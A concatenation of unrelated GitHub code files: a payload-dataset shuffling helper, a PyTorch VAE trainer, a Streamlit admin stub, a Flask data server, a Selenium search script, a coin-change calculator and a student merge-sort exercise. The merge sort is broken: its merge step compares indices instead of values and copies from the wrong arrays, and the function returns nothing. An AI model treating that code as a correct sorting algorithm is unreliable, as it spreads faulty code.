final_list[\"category\"]}\n\n # let's shuffle it and write the final dataset as CSV\n\n print(\"#\" * 20 + \" Shuffling And Creating Final DataSet \" + \"#\" * 20)\n\n df_finalist = pd.DataFrame(finale, columns=[\"payload\", \"category\"])\n df_finalist[\"payload\"] = df_finalist[\"payload\"].apply(MergeList)\n\n # if df_finalist.isnull().sum() > 1:\n # print(\"[!] There are null in datas\")\n df_shuffled = df_finalist.sample(frac=1, random_state=555).reset_index(drop=True)\n # df_shuffled= df_shuffled.dropna(how=\"any\")\n print(df_shuffled.isnull().sum())\n df_shuffled.to_csv(\"data/final/final.csv\", \",\", index=False)\n\n df_finalist[\"payload\"] = df_finalist['payload'].str.encode('utf-8')\n df_finalist[\"payload\"] = df_finalist[\"payload\"].apply(ToHex)\n\n # # utf-8 hex encoded version\n # print(bytearray.fromhex(df_finalist['payload'][44]))\n\n df_shuffled = df_finalist.sample(frac=1, random_state=555).reset_index(drop=True)\n # df_shuffled = df_shuffled.dropna(axis=1)\n df_shuffled.to_csv(\"data/final/final_hex.csv\", \",\", index=False)\n\n print(\"All done check out data/final folder\")\n\n\n#\n#\ndef ToHex(s):\n return s.hex()\n\n\ndef KeyExist(key, p_dict):\n if key in p_dict.keys():\n return True\n else:\n return False\n\n\ndef CountKeys(key, p_dict):\n count = 0\n for k in p_dict[\"category\"]:\n if k == key:\n count += 1\n return count\n\n\ndef MergeList(s):\n if isinstance(s, list):\n return str(s[0])\n elif isinstance(s, bytes):\n return str(s.decode())\n elif isinstance(s, str):\n return s\n else:\n return s\n","repo_name":"0xsha/PayloadDetector","sub_path":"helpers/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":15703,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"39303104311","text":"import os\nimport time\nfrom ast import literal_eval\nfrom datetime import datetime\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.datasets as Datasets\nimport torchvision.models as models\nimport torchvision.transforms as T\nimport torchvision.utils as vutils\nfrom torch.utils.data import Dataset, DataLoader\nfrom tqdm.notebook import trange, tqdm\n\nfrom RES_VAE0 import VAE\nfrom vgg19 import VGG19\n\n# ---------------------------------------------------------------\ndate_time_obj = 
datetime.now()\ntimestamp_str = date_time_obj.strftime(\"%Y-%m-%d_%H.%M.%S\")\nprint('Current Timestamp : ', timestamp_str)\nstart_time_total = time.perf_counter()\n# ---------------------------------------------------------------\n# Parameter you can change\n\nbatch_size = 128\nnum_epoch = 1\n# Available datasets: celeba_small, celeba\ndataset = \"celeba_small\" # < --------------change this!\nprint(\"dataset = \", dataset)\nlatent_dim = 128 # < --------------change this!\n\n# Checkpoint os pretrained models\n# \"CNN_VAE_celeba_small_2022-08-04_21.40.10\" (small, for testing)\n# \"CNN_VAE_celeba_2022-08-04_18.05.43\" (large model trained for 20 epochs)\n# \"celebA_64_8_epoch_latent_dim_128\"\n# \"CNN_VAE_celeba_2022-08-04_23.22.32\" (add condition to layer 4, trained for 10 epochs, good result, latent = 128) RES_VAE2, run2\n# CNN_VAE_celeba_2022-08-05_01.49.10 #(VAE3) (add condition to layer 5)\n# CNN_VAE_celeba_2022-08-05_03.20.52 #python run2.py (add condition to layer 4) VAE2 , latent dim = 128\n# CNN_VAE_celeba_2022-08-05_11.31.54 # run2.py (add condition to layer 4) VAE2, latent dim = 512 (quality not good, 10 epoch)\n\n#continue training \"CNN_VAE_celeba_2022-08-04_23.22.32\" for 10 epochs, ...\n\n# !! no \"pt\"\n# set to None if you do not want to load a checkpoint\n#\nload_checkpoint = None\nrun_train = True\n\n# logging\nif run_train and load_checkpoint:\n print(\"Train with pretrained model...\")\nelif run_train and load_checkpoint is None:\n print(\"Train from scratch...\")\nelif load_checkpoint is not None and not run_train:\n print(\"Only load pretrained model, do not train...\")\nelif load_checkpoint is None and not run_train:\n #print(\"Set run_train to True or give a checkpoint\")\n raise SystemExit(\"!Set run_train to True or give a checkpoint...\")\n\n\n# ---------------------------------------------------------------\n# Parameters you may NOT want to change\ncondition_dim = 512\nimage_size = 64\nlr = 1e-4\nstart_epoch = 0\ndataset_root = \"./input/\"\nsave_dir = os.getcwd()\nbeta = 0.1\n\n# ---------------------------------------------------------------\nuse_cuda = torch.cuda.is_available()\nGPU_indx = 0\ndevice = torch.device(GPU_indx if use_cuda else \"cpu\")\n\n# ---------------------------------------------------------------\nif load_checkpoint:\n model_name = load_checkpoint\nelse:\n model_name = f\"CNN_VAE_{dataset}_{timestamp_str}\" # \"STL10_8\" #\"STL10_8\" #STL10_8_64.pt\n\n\n# ---------------------------------------------------------------\nclass CelebA_CLIP(Datasets.ImageFolder):\n def __init__(\n self,\n root,\n transform,\n image_folder,\n clip_embeddings_csv\n ):\n super(CelebA_CLIP, self).__init__(\n root=root,\n transform=transform\n )\n\n self.clip_embeddings = clip_embeddings_csv\n self.samples = self.make_dataset_(root, None, None, None)\n self.root = os.path.join(root, image_folder)\n\n def __len__(self) -> int:\n return len(self.samples)\n\n def make_dataset_(self, root, class_to_idx, extensions, is_valid_file):\n df = pd.read_csv(self.clip_embeddings, index_col=0,\n converters={'embeddings': literal_eval})\n im_names = df['image_id'].values\n # img_embed = zip(df['image_id'].values, df[\"embeddings\"].values)\n # img_embed = tuple(zip(range(len(im_names)), im_names, df[\"embeddings\"].values))\n targets = df[\"embeddings\"].values # #(batch,)\n img_embed = tuple(zip(im_names, targets))\n\n return list(img_embed)\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is 
class_index of the target class.\n \"\"\"\n # print(len(self.samples))\n # print(\"index,\", index)\n path, target = self.samples[index]\n # print(\"path\", path)\n path = os.path.join(self.root, path)\n # print(\"path\", path)\n\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n\n target = torch.tensor(target)\n\n return sample, target\n\n\n# ---------------------------------------------------------------\ndef get_data_STL10(transform, batch_size, download=True, root=\"./input\"):\n print(\"Loading trainset...\")\n trainset = Datasets.STL10(root=root, split='unlabeled', transform=transform, download=download)\n\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)\n\n print(\"Loading testset...\")\n testset = Datasets.STL10(root=root, split='test', download=download, transform=transform)\n\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n print(\"Done!\")\n\n return trainloader, testloader\n\n\ndef get_data_celebA(transform, batch_size, download=False, root=\"/data\"):\n # data_root = \"../../datasets/celeba_small/celeba/\"\n data_root = \"../../datasets/resized_celebA2/\"\n training_data = CelebA_CLIP(root=data_root,\n transform=transform,\n image_folder=\"celebA\",\n clip_embeddings_csv=\"./embeddings.csv\")\n print(\"dataset size\", len(training_data)) # 202599\n test_size = 16\n train_size = len(training_data) - test_size\n trainset, testset = torch.utils.data.random_split(training_data, [train_size, test_size])\n\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=8)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=8)\n print(\"Done load dataset\")\n return trainloader, testloader, train_size\n\n\ndef get_data_celebA_small(transform, batch_size, download=False, root=\"/data\"):\n data_root = \"./datasets/celeba_small/celeba/\"\n training_data = CelebA_CLIP(root=data_root,\n transform=transform,\n image_folder=\"img_align_celeba\",\n clip_embeddings_csv=\"./embeddings_128.csv\")\n\n print(\"dataset size\", len(training_data)) # 128\n test_size = 16\n train_size = len(training_data) - test_size\n trainset, testset = torch.utils.data.random_split(training_data, [train_size, test_size])\n\n trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=8)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=8)\n print(\"Done load dataset\")\n return trainloader, testloader, train_size\n\n\n# ---------------------------------------------------------------\nif dataset == \"celeba\":\n # transform = T.Compose([T.CenterCrop(178),T.Resize((image_size,image_size)), T.ToTensor()])\n # transform = T.Compose([T.Resize((image_size,image_size)), T.ToTensor()])\n transform = T.Compose([T.Resize(image_size), T.ToTensor()])\n trainloader, testloader, train_size = get_data_celebA(transform, batch_size, download=True, root=dataset_root)\nelif dataset == \"celeba_small\":\n transform = T.Compose([T.CenterCrop(178), T.Resize((image_size, image_size)), T.ToTensor()])\n trainloader, testloader, train_size = get_data_celebA_small(transform, batch_size, download=True, root=dataset_root)\nelse:\n transform = T.Compose([T.Resize(image_size), T.ToTensor()])\n trainloader, testloader = get_data_STL10(transform, batch_size, download=True, root=dataset_root)\n\n# ---------------------------------------------------------------\n# get a test image batch from the testloader to 
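# CelebA_CLIP above pairs each image with a precomputed CLIP embedding read from a
# CSV. A self-contained sketch of the same (sample, target) pattern with synthetic
# in-memory data instead of files; all names here are hypothetical.
import torch
from torch.utils.data import Dataset, DataLoader

class PairedEmbeddingDataset(Dataset):
    def __init__(self, images, embeddings):
        assert len(images) == len(embeddings)
        self.images = images          # tensor of image tensors, e.g. (N, 3, 64, 64)
        self.embeddings = embeddings  # tensor of embedding vectors, e.g. (N, 512)

    def __len__(self):
        return len(self.images)

    def __getitem__(self, index):
        return self.images[index], self.embeddings[index]

# usage sketch: 8 fake 3x64x64 images paired with 512-d embeddings
# loader = DataLoader(PairedEmbeddingDataset(torch.rand(8, 3, 64, 64),
#                                            torch.rand(8, 512)), batch_size=4)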
visualise the reconstruction quality\ndataiter = iter(testloader)\ntest_images, test_labels = next(dataiter)\nprint(\"load test batch\")\nprint(\"image input shape\", test_images.shape)\nprint(\"condition shape\", test_labels.shape)  # torch.Size([16, 1, 512])\n\n\n# ---------------------------------------------------------------\n# OLD way of getting features and calculating loss - Not used\n\n# create an empty layer that will simply record the feature map passed to it.\nclass GetFeatures(nn.Module):\n    def __init__(self):\n        super(GetFeatures, self).__init__()\n        self.features = None\n\n    def forward(self, x):\n        self.features = x\n        return x\n\n\n# download the pre-trained weights of the VGG-19 and append them to an array of layers.\n# we insert a GetFeatures layer after a relu layer.\n# layers_deep controls how deep we go into the network\ndef get_feature_extractor(layers_deep=7):\n    C_net = models.vgg19(pretrained=True).to(device)\n    C_net = C_net.eval()\n\n    layers = []\n    for i in range(layers_deep):\n        layers.append(C_net.features[i])\n        if isinstance(C_net.features[i], nn.ReLU):\n            layers.append(GetFeatures())\n    return nn.Sequential(*layers)\n\n\n# this function calculates the L2 loss (MSE) on the feature maps copied by the layers_deep\n# between the reconstructed image and the original\ndef feature_loss(img, recon_data, feature_extractor):\n    img_cat = torch.cat((img, torch.sigmoid(recon_data)), 0)\n    out = feature_extractor(img_cat)\n    loss = 0\n    for i in range(len(feature_extractor)):\n        if isinstance(feature_extractor[i], GetFeatures):\n            loss += (feature_extractor[i].features[:(img.shape[0])] - feature_extractor[i].features[\n                                                                      (img.shape[0]):]).pow(2).mean()\n    return loss / (i + 1)\n\n\n# Linear scaling the learning rate down\ndef lr_Linear(epoch_max, epoch, lr):\n    lr_adj = ((epoch_max - epoch) / epoch_max) * lr\n    set_lr(lr=lr_adj)\n\n\ndef set_lr(lr):\n    for param_group in optimizer.param_groups:\n        param_group['lr'] = lr\n\n\ndef vae_loss(recon, x, mu, logvar):\n    recon_loss = F.binary_cross_entropy_with_logits(recon, x)\n    KL_loss = -0.5 * (1 + logvar - mu.pow(2) - logvar.exp()).mean()\n    loss = recon_loss + 0.01 * KL_loss\n    return loss\n\n\n# ---------------------------------------------------------------\n\n# Create the feature loss module\n\n# load the state dict for vgg19\nstate_dict = torch.hub.load_state_dict_from_url('https://download.pytorch.org/models/vgg19-dcbb9e9d.pth')\n# manually create the feature extractor from vgg19\nfeature_extractor = VGG19(channel_in=3)\n\n# loop through the loaded state dict and our vgg19 features net,\n# loop will stop when net.parameters() runs out - so we never get to the \"classifier\" part of vgg\nfor ((name, source_param), target_param) in zip(state_dict.items(), feature_extractor.parameters()):\n    target_param.data = source_param.data\n    target_param.requires_grad = False\n\nfeature_extractor = feature_extractor.to(device)\n\n# ---------------------------------------------------------------\n\n# Create the save directory if it does not exist\nif not os.path.isdir(save_dir + \"/Models\"):\n    os.makedirs(save_dir + \"/Models\")\nif not os.path.isdir(save_dir + \"/Results\"):\n    os.makedirs(save_dir + \"/Results\")\n\nresult_folder = os.path.join(save_dir, \"Results\", f\"result_{model_name}\")\nif not os.path.exists(result_folder):\n    os.mkdir(result_folder)\n\n# ---------------------------------------------------------------\n# Load / Initialize the model\nmodel_save_path = os.path.join(save_dir, \"Models\", model_name + \".pt\")\n\n\n\nif 
load_checkpoint:\n\n if model_name == \"CNN_VAE_celeba_2022-08-04_18.05.43\":\n batch_size = 128\n condition_dim = 512\n latent_dim = 512\n checkpoint = torch.load(save_dir + \"/Models/\" + model_name + \".pt\", map_location=\"cpu\")\n print(\"Checkpoint loaded\")\n vae_net = VAE(channel_in=3 + condition_dim, ch=64, z=latent_dim, condition_dim=condition_dim).to(device)\n optimizer = optim.Adam(vae_net.parameters(), lr=lr, betas=(0.5, 0.999))\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n vae_net.load_state_dict(checkpoint['model_state_dict'])\n start_epoch = checkpoint[\"epoch\"]\n loss_log = checkpoint[\"loss_log\"]\n\n else:\n vae_net = torch.load(model_save_path)\n\nelif run_train:\n # If checkpoint does exist raise an error to prevent accidental overwriting\n if os.path.isfile(model_save_path):\n # raise ValueError(\"Warning Checkpoint exists\")\n print(\"Warning Checkpoint exists\")\n\n # Create VAE network\n # z = latent dim, ch = out channel\n print(\"Initialize VAE net ...\")\n vae_net = VAE(channel_in=3, ch=64, z=latent_dim).to(device)\n\n# setup optimizer\noptimizer = optim.Adam(vae_net.parameters(), lr=lr, betas=(0.5, 0.999))\n# Loss function\nBCE_Loss = nn.BCEWithLogitsLoss()\n\n# ---------------------------------------------------------------\ndef convert_batch_to_image_grid(image_batch, dim=64):\n print(\"image_batch\", image_batch.shape)\n # torch.Size([16, 3, 64, 64])\n reshaped = (image_batch.reshape(4, 8, dim, dim, 3)\n .transpose(0, 2, 1, 3, 4)\n .reshape(4 * dim, 8 * dim, 3))\n return reshaped\n\n\nimport torchvision\n\n\ndef show_image_grid(img_tensor, save_path):\n grid_img = torchvision.utils.make_grid(img_tensor.cpu())\n plt.figure(figsize=(20, 20))\n plt.imshow(grid_img.permute(1, 2, 0))\n plt.axis('off')\n plt.show()\n plt.savefig(os.path.join(save_path), dpi=200, bbox_inches='tight')\n\n\ndef save_each_image(img_tensor):\n img_tensor = img_tensor.detach()\n for i in range(img_tensor.shape[0]):\n img = img_tensor[i].permute(1, 2, 0)\n plt.imshow(img.numpy())\n im_name = 'img_{}.png'.format(i)\n plt.savefig(os.path.join(save_dir, \"Results\", im_name), dpi=200, bbox_inches='tight')\n\n\n\ndef image_generation():\n batch = 16\n latent_dim = vae_net.latent_dim\n # sample both initial input and condition\n mu = torch.zeros(batch, latent_dim , 1, 1) + 1.0\n log_var = torch.zeros(batch, latent_dim, 1, 1) + 0.3\n # # print(mu.shape)\n # zero_tensor = torch.zeros(batch, condition_dim, 1, 1).to(device)\n\n\n z = vae_net.encoder.sample(mu.to(device), log_var.to(device))\n #z_cond = torch.cat((z, zero_tensor), dim=1)\n # print(\"zcond\",z_cond.shape) #zcond torch.Size([128, 512, 1, 1])\n logits = vae_net.decoder(z)\n generated = torch.sigmoid(logits)\n save_path = os.path.join(result_folder, \"generation_zero.png\")\n vutils.save_image(generated, save_path)\n print(\"save image at\", save_path)\n save_path2 = os.path.join(result_folder, \"generation_zero2.png\")\n show_image_grid(generated, save_path2)\n\n\n# ----------------------------------------------------------\ndef train():\n\n loss_log = []\n\n # save log\n with open(os.path.join(result_folder, \"params.txt\"), \"w\") as f:\n f.write(f\"epoch = {num_epoch}\\n\")\n f.write(f\"learning_rate = {lr}\\n\")\n f.write(f\"train_size = {train_size}\\n\")\n f.write(f\"batch_size = {batch_size} \\n\")\n f.write(f\"label_dim = {condition_dim}\\n\")\n f.write(f\"image_size = {image_size}\\n\")\n f.write(f\"latent_dim = {latent_dim}\\n\")\n f.write(f\"beta = {beta}\\n\")\n f.write(f\"model checkpoint = 
{model_save_path}\\n\\n\")\n\n    for epoch in trange(start_epoch, num_epoch, leave=False):\n        start_time_epoch = time.perf_counter()\n        lr_Linear(num_epoch, epoch, lr)\n        vae_net.train()\n        for i, (images, _) in enumerate(tqdm(trainloader, leave=False)):\n            images = images.to(device)\n            #condition = condition.to(device)  # [batch, 512]\n            # recon_data = [batch, 3 + 512, 64, 64]\n            recon_data, mu, logvar = vae_net(images)\n\n            # VAE loss\n            loss = vae_loss(recon_data, images, mu, logvar)\n\n            # Perception loss\n            loss += feature_extractor(torch.cat((torch.sigmoid(recon_data), images), 0))\n\n            loss_log.append(loss.item())\n            vae_net.zero_grad()\n            loss.backward()\n            optimizer.step()\n\n        # In eval mode the model will use mu as the encoding instead of sampling from the distribution\n        print(\"epoch\", epoch)\n        exec_time_epoch = time.perf_counter() - start_time_epoch\n\n        print(f\"time epoch = {exec_time_epoch} sec ({exec_time_epoch / 60.0} min )\\n\")\n        with open(os.path.join(result_folder, \"params.txt\"), \"a\") as f:\n            f.write(f\"\\nepoch {epoch}, time epoch = {exec_time_epoch} sec ({exec_time_epoch / 60.0} min )\\n\")\n\n        vae_net.eval()\n        with torch.no_grad():\n            recon_data, _, _ = vae_net(test_images.to(device))\n            images = torch.cat((torch.sigmoid(recon_data.cpu()), test_images), 2)\n            save_path = os.path.join(result_folder, \"recon\" + \"_\" + str(epoch) + \".png\")\n            # save_path = \"%s/%s/%s_%d_%d.png\" % (save_dir, \"Results\", model_name, image_size, epoch)\n            # print(images.shape)  # [128, 3, 128, 64]\n            print(\"save image at\", save_path)\n            vutils.save_image(images, save_path)\n\n            # Save a checkpoint\n            torch.save(vae_net, model_save_path)\n            # torch.save({\n            #     'epoch': epoch,\n            #     'loss_log': loss_log,\n            #     'model_state_dict': vae_net.state_dict(),\n            #     'optimizer_state_dict': optimizer.state_dict()\n            #\n            # }, model_save_path)\n            # torch.save(vae_net, model_save_path)\n            print(\"Save checkpoint at\", model_save_path)\n\n    exec_time_total = time.perf_counter() - start_time_total\n    print(f\"time total = {exec_time_total} sec ({exec_time_total / 60.0} min )\\n\")\n    with open(os.path.join(result_folder, \"params.txt\"), \"a\") as f:\n        f.write(f\"\\ntime total = {exec_time_total} sec ({exec_time_total / 60.0} min )\\n\")\n\n\n# ---------------------------------------------------------------\nif __name__ == \"__main__\":\n    if run_train:\n        train()\n    image_generation()\n\n","repo_name":"meanna/CVAE_VGG19","sub_path":"train_no_condition.py","file_name":"train_no_condition.py","file_ext":"py","file_size_in_byte":18197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38867846345","text":"from PIL import Image\n\n\ndef count_pixels(file_path, color: tuple):\n    \"\"\"Принимает путь к файлу и искомый цвет в виде (R, G, B),\n    преобразует файл в RGB, собирает словарь цветов вида {цвет: количество пикселей} с помощью PIL.getcolors.\n    Возвращает количество пикселей соответствующего цвета.\n    \"\"\"\n    img = Image.open(file_path)\n    img = img.convert('RGB')\n    color_dict = {color: count for count, color in img.getcolors(img.size[0]*img.size[1])}  # img.size[0]*img.size[1] -\n    try:                                                    # - макс количество цветов\n        pixel_count = color_dict[color]                     # на изображении\n        return pixel_count\n    except KeyError:\n        pixel_count = -1\n        return pixel_count\n","repo_name":"rand0mizator/TestTaskSimple","sub_path":"main/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
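# count_pixels above relies on Image.getcolors(); note that Image.convert()
# returns a new image rather than converting in place. A minimal alternative
# sketch that tallies every colour in one pass with collections.Counter:
from collections import Counter
from PIL import Image

def count_color(file_path, color):
    img = Image.open(file_path).convert('RGB')  # convert() must be reassigned
    counts = Counter(img.getdata())
    return counts.get(color, -1)  # -1 mirrors the KeyError fallback above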
+{"seq_id":"41196148862","text":"import streamlit as st\n\n# set back homepage state\nst.session_state.click = False\n\n# default admin session sate as false\n# st.session_state.admin = False\n# set admin sesstion state\nif 'admin' not in st.session_state:\n st.session_state.admin = False\n\n\nif not st.session_state.admin:\n st.warning(\"You must log-in to see the content of this page!\")\n st.stop()\nelse:\n # only show it when logged in with Admin crendentials\n st.title(\"Welcome, Admin\")\n # sidebar for admin page\n\n menu = [\"Create Profile\",\"View Profile\", \"Edit Profile\", \"Delete Profile\",\"Access Azure\"]\n choice = st.sidebar.radio(\"Select operation\",menu)\n if choice == \"Create Profile\":\n st.subheader(\"Create Profile\")\n\n elif choice == \"View Profile\":\n st.subheader(\"View Profile\")\n\n elif choice == \"Edit Profile\":\n st.subheader(\"Edit Profile\")\n\n elif choice == \"Delete Profile\":\n st.subheader(\"Delete Profile\")\n\n elif choice == \"Access Azure\":\n st.subheader(\"Access Azure\")\n","repo_name":"KarenJin-NZ/CS301-AttendanceSystem","sub_path":"app/pages/Admin.py","file_name":"Admin.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31208324030","text":"import matplotlib.pyplot as plt\nimport random\nimport time\n\n###########################################\n\ndef TableauAuHasard(n):\n TabHasard=[random.randint(1,10001) for i in range(n)]\n return TabHasard\n\ndef TriFusion(n,T):\n if n>1:\n n1=n//2\n n2 = n - n1\n T1=T[0:n1]\n T2=T[n2:]\n gauche = TriFusion(n1,T1)\n droite = TriFusion(n2,T2)\n fusionne = Fusion(n1,n2,gauche,droite,T)\n return fusionne\n\n \n\ndef Fusion(n1, n2, T1, T2, T):\n i1 = 0\n i2 = 0\n i = 0\n while(i1 < n1 and i2 < n2):\n if i1 <= i2:\n T[i] = T1[i1]\n i += 1\n i1 += 1\n else :\n T[i] = T1[i2]\n i += 1\n i2 += 1\n if i1 == n1:\n while i2 < n2:\n T[i] = T[i2]\n i += 1\n i2 += 1\n else :\n while i1 < n1:\n T[i] = T[i1]\n i += 1\n i1 += 1\n\n\ndef TriBulles(n,T):\n pass\n #\n # A COMPLETER (et enlever pass)\n #\n\n#######Programme Principal########\n\nchoix=int(input(\"Taper 1 pour un test sur le TriFusion, 2 pour un comparatif TriFusion/TriBulles: \"))\nif choix==1:\n Tab=[0]\n n=int(input(\"Entrez la taille du tableau à trier: \"))\n Tab=TableauAuHasard(n)\n print(\"Tableau à trier: \",Tab)\n TabFusion=list(Tab)\n TriFusion(n, TabFusion)\n print(\"Après TriFusion: \",TabFusion)\n TriBulles(n, Tab)\n print(\"Après TriBulles: \",Tab)\nelse: \n #Valeurs de n choisies \n abscisses = [n for n in range(1,1000,10)]\n #Temps de calcul\n tps1 = []\n tps2 = []\n for n in range(1,1000,10):\n T=TableauAuHasard(n)\n T2=list(T)\n t=time.time()\n TriBulles(n, T)\n tps1.append(time.time()-t)\n t=time.time()\n TriFusion(n, T2)\n tps2.append(time.time()-t)\n #Tracé\n plt.plot(abscisses, tps1)\n plt.plot(abscisses, tps2)\n plt.show()","repo_name":"Manguil/fds","sub_path":"L2/S4/Algoritmique/TP2/TP2Exo1TriFusion.py","file_name":"TP2Exo1TriFusion.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"fr","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"14104623456","text":"import os\nimport json\nfrom flask import Flask\nfrom flask_restful import abort, Api, Resource\nfrom functools import wraps\n\n\napp = Flask(__name__)\napi = Api(app)\ndatasetpart = {}\ndatasetparthourly = {}\n\n\ndef cors(func, allow_origin=None, allow_headers=None, max_age=None):\n if not allow_origin:\n allow_origin = 
\"*\"\n if not allow_headers:\n allow_headers = \"content-type, accept\"\n if not max_age:\n max_age = 60\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n response = func(*args, **kwargs)\n cors_headers = {\n \"Access-Control-Allow-Origin\": allow_origin,\n \"Access-Control-Allow-Methods\": func.__name__.upper(),\n \"Access-Control-Allow-Headers\": allow_headers,\n \"Access-Control-Max-Age\": max_age,\n }\n if isinstance(response, tuple):\n if len(response) == 3:\n headers = response[-1]\n else:\n headers = {}\n headers.update(cors_headers)\n return (response[0], response[1], headers)\n else:\n return response, 200, cors_headers\n return wrapper\n\n\ndef abortIfNotExist(fileName):\n filepath = '../data/json/' + fileName\n if not os.path.exists(filepath):\n abort(404, message=\"{} doesn't exist\".format(fileName))\n\n\nclass Resource(Resource):\n method_decorators = [cors]\n\n\nclass DataResource(Resource):\n\n def get(self, parameters):\n print('request in')\n try: # params: city&factor1&factor2\n params = parameters.split('&')\n params = [p.split('=')[1] for p in params]\n print(params)\n with open('../data/json/' + params[1] + '.json', 'r') as f:\n city = params[0]\n data = json.load(f)\n data1 = []\n for d in data:\n data1.append({'value': d[city], 'date': d['date']})\n with open('../data/json/' + params[2] + '.json', 'r') as f:\n data2 = json.load(f)\n with open('../data/ccm/ccm.json', 'r') as f:\n # {Tokyo: {rainfall: {temperature: [kyoto: 1, nagoya: 1]} }}\n data = json.load(f)\n # data3 = data[params[0]][params[1]][params[2]]\n tmp_dict = data[params[0]]\n k0 = params[0]\n # {'cloud':{'rainfall':{'Kyoto':0.1}'}}\n data3 = []\n for k1, v1 in tmp_dict.items(): # k1=cloud\n for k2, v2 in v1.items(): # k2=rainfall\n for k3, v3 in v2.items(): # k3=kyoto\n data3.append([k0 + '-' + k1 + '-' + k2 + '-' + k3,\n str(v3[int(params[3]) - 1])])\n return [data1, data2, data3]\n except:\n abort(404, message=\"data doesn't exist\")\n\n\napi.add_resource(DataResource, '/data/')\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(debug=True, host='0.0.0.0', port=port)\n","repo_name":"g-yuqing/WeatherCausalityVis","sub_path":"py/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21914072929","text":"import opinion as op\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\n\nY0 = np.array([0.0,4.0,5.0,6.0,10.0,11.0,12.0])\nP0 = np.array([0.01,0.01])\nX0 = np.concatenate((Y0,P0))\n\nt = np.linspace(0.0,30.0,100)\n\nX = odeint(op.dynX, X0, t)\n\nx0 = X[:,0].reshape(-1,1)\nxi = X[:,1:-2]+x0\n\nplt.plot(t,x0,'r')\nplt.plot(t,xi,'b')\nplt.show()","repo_name":"florian-die/opinion-optimal-python","sub_path":"test_ode.py","file_name":"test_ode.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13936848157","text":"# Script uses selenium to automatcally launch a browser and go to python.org and then uses python.org search functionality to search for \"pycon\"\n\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\ndriver=webdriver.Firefox()\ndriver.get('http://www.python.org')\nassert \"Python\" in driver.title\n\nelem=driver.find_element_by_name(\"q\")\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in 
driver.page_source\ndriver.close()\n","repo_name":"MayankPratap/i_love_python","sub_path":"python_org_search.py","file_name":"python_org_search.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"20207477745","text":"def count():\n\tDollars = (10000,5000,2000,1000,500,200,100,25,10,5,1)\n\tEuros = (50000,20000,10000,5000,2000,1000,500,200,100,50,20,10,5,2,1)\n\tYen = (100000,50000,20000,10000,5000,1000,500,100,50,10)\n\tPounds = (5000,2000,1000,500,200,100,50,20,10,5,1)\n\n\tquestion = input(\"Select your currency (type '?' for options), or type 'custom' to add one: \")\n\tif (question == \"?\"):\n\t\tcurrencies = (\"-dollars\", \"-euros\", \"-yen\", \"-pounds\", \"-custom\", \"*all lowercase\")\n\n\t\tfor words in currencies:\n\n\t\t    print(words)\n\t\tcount()\n\telif (question == \"dollars\"):\n\t\tcurrency = Dollars\n\telif (question == \"euros\"):\n\t\tcurrency = Euros\n\telif (question == \"yen\"):\n\t\tcurrency = Yen\n\telif (question == \"pounds\"):\n\t\tcurrency = Pounds\n\telif (question == \"custom\"):\n\t\tnum = input(\"Okay. Now, please provide coins/bills values separated by commas. e.g. 100,20,0.25: \")\n\t\tC_list = list(map(float,num.split(',')))\n\t\tCustomCurrency = tuple(sorted([i * 100 for i in C_list], reverse = True))\n\t\tcurrency = CustomCurrency\n\telse:\n\t\tprint(\"Currency not recognized, try again.\")\n\t\tcount()\n\n\n\ttotal = 100*float(input(\"What is the total amount of money (in your currency)? \"))\n\tcoinsE = 0\n\tfor i in currency:\n\t\tcoins, remain = divmod(total,i)\n\t\ttotal = round(remain)\n\t\tcoinsE += coins\n\tif (remain == 0):\n\t\tprint(\"You need at least \", coinsE, \" coins/bills to match that amount.\")\n\telse:\n\t\tprint(\"Your currency or total is defective, you can't match that amount.\")\n\treturnC = input(\"Do you want to evaluate a different change? 
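# find_element_by_name() was removed in Selenium 4; the equivalent lookup uses a
# By locator. A hedged sketch of the same flow (left commented out because it
# launches a real browser):
# from selenium import webdriver
# from selenium.webdriver.common.by import By
# from selenium.webdriver.common.keys import Keys
#
# driver = webdriver.Firefox()
# driver.get("http://www.python.org")
# elem = driver.find_element(By.NAME, "q")
# elem.send_keys("pycon", Keys.RETURN)
# driver.quit()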
